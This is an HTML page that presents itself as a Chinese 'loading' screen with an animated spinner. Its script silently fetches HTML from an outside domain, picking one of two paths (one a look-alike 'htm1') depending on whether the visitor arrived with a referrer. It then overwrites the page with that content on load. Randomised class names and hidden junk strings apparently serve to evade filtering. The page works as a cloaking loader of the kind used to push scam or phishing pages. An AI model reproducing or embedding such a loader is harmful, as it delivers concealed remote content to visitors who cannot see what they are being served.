<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .As4Gw5bvXxR {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .As4Gw5bvXxR .HSIChys1 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .As4Gw5bvXxR .content {
            line-height: 50px;
            text-align: center
        }

        .As4Gw5bvXxR .img {
            width: 100%
        }

        .As4Gw5bvXxR .XchwWELWj {
            text-align: center
        }

        .As4Gw5bvXxR .XchwWELWj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .As4Gw5bvXxR .XchwWELWj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .As4Gw5bvXxR .XchwWELWj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .As4Gw5bvXxR .XchwWELWj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .As4Gw5bvXxR .XchwWELWj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .As4Gw5bvXxR .XchwWELWj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .As4Gw5bvXxR .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function G5WCzgagG(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var yAoDA = G5WCzgagG('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ yAoDA +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ yAoDA +".html?a=share";
		}
		
        fpcihsUL=url+"#"+new Date().getTime();
        fpcihsUL && function() {
            $.get(fpcihsUL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >aIgimMz29mBUMBcyWTLUCdBSz00CKYogn0EoEkSAYlR2iAA3u4k5HwVfokRfJ</h1>
<b style='display:none' >TBnTfjimSo7y3ggfT9HMRVWIlxhzTbCcSCWwtNkFEFp73y3R5vS7CfItWO8D7wjhMcuHMvZrjcUwQGvs7FdKd</b>
<a  href='#' style='display:none'>JxMZPSBU5TFNpDDdVXO5JOZF4</a>
<span style='display:none'>P2cgM9JjqriyS8n8rNfUjBXCFdf1a6</span>
<ul style='display:none' >zZGCMyMFSBNXTf73d2STEC</ul><div class="As4Gw5bvXxR">
    <div class="HSIChys1">
        <div class="XchwWELWj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >Q8eVjyjadneJ2fGY</h1>
<img  src='' style='display:none'>
<ul style='display:none' >IHbRtl1BuWncMh47bZu3kAVPeaQFX62Xzmu</ul>
<b style='display:none' >sHtqFt3O376BBwCl6pqLs3RE4DJpPI7xqoXFyJm3SY</b>
<a  href='#' style='display:none'>S1M2rF7zPTC7Te9w5TrZoV5JesBvyM</a></body>
</html>